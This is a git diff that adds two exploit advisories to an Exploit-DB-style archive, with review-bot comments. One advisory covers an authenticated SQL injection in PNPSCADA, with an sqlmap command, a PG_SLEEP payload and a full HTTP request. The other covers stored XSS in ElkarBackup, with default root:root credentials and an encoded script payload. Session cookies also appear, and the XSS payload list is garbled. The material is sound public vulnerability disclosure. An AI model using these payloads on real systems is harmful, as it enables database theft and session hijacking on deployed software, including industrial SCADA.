diff --git a/exploits/hardware/webapps/48757.txt b/exploits/hardware/webapps/48757.txt
new file mode 100644
index 000000000..0802fe7d1
--- /dev/null
+++ b/exploits/hardware/webapps/48757.txt
@@ -0,0 +1,57 @@
+# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
+# Google Dork: -
+# Date: 2020-08-17
+# Exploit Author: İsmail ERKEK
+# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
+# Version: 2.200816204020
+# Tested on: -
+
+
+1. Description:
+----------------------
+
+PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in
+/browse.jsp. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from one of the affected pages with
+'interf' parameter and save it like fuel.req Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent
+
+3. Example payload:
+----------------------
+
+(time-based blind)
+
+memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
+6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831
+
+4. Burpsuite request:
+----------------------
+
+POST /browse.jsp HTTP/1.1
+Host: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
+Trident/5.0)
+Connection: close
+Referer:
+http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 93
+Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37
+
+memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
+
+
+
+Best Regards.
+Ek alanı
\ No newline at end of file
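Review bot: The captured request in section 4 still carries what look like real session values (`JSESSIONID=1ojrclvd94cpfebapnqebli37`, `psl=7465737433`); these should be replaced with labelled placeholders such as `JSESSIONID=<redacted>` before the file is published. The write-up also stops at the proof of concept and gives operators nothing to act on: a closing section along the lines of `5. Mitigation: treat 'interf' as an integer and bind it as a query parameter in /browse.jsp; until a fixed build is available, alert on requests whose 'interf' value is not purely numeric` would help, though the server-side code is not shown here, so the exact fix is an assumption. Section 2 says to save the request as `fuel.req` while the command reads `req-pnp-browse.txt`, so one of the two names should be corrected. `Tested on: -` is left empty, and the trailing `Ek alanı` line looks like mail-client residue that can be dropped.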
diff --git a/exploits/php/webapps/48756.txt b/exploits/php/webapps/48756.txt
new file mode 100644
index 000000000..ca34b20d6
--- /dev/null
+++ b/exploits/php/webapps/48756.txt
@@ -0,0 +1,40 @@
+# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
+# Date: 2020-08-14
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://www.elkarbackup.org/
+# Version: 1.3.3
+# Tested on: Linux
+
+1- Go to following url. >> http://(HOST)/elkarbackup/login
+2- Default username and password is root:root. We must know login credentials.
+3- Go to "Jobs" and press "Add client" button.
+4- Write XSS payload in "Name" section.
+5- Press "Save" button.
+
+(( Executable XSS Payloads ))
+
+1- ">
+2- ">
+3- ">
+4- ">
+
+
+(( REQUEST ))
+
+POST /elkarbackup/client/2 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://(HOST)/elkarbackup/client/2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 358
+Connection: close
+Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
+Upgrade-Insecure-Requests: 1
+
+Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&
+Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&
+Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&
+Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
\ No newline at end of file
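Review bot: All four entries under "(( Executable XSS Payloads ))" are the same bare `">`, so the markup appears to have been stripped before commit and the list no longer documents what was tested; either remove the list or point readers to the encoded `Client[name]` value in the request below. The request still contains `PHPSESSID=dop3m1qj8c5octaxuasd21as2` and a `Client[_token]` value, which should be replaced with placeholders such as `PHPSESSID=<redacted>`. Step 2 reads ambiguously and would be clearer as `2- Log in with valid credentials (the default is root:root).` For administrators, a short closing note would be useful: change the default root password, and the fix is presumably to HTML-escape the client name wherever it is rendered (the template is not shown here, so confirm against the vendor's patch).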
diff --git a/files_exploits.csv b/files_exploits.csv
index 86e76fefb..493c5d106 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42996,3 +42996,5 @@ id,file,description,date,author,type,platform,port
48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,
48755,exploits/hardware/webapps/48755.txt,"Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal",2020-08-19,Tuygun,webapps,hardware,
+48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php,
+48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,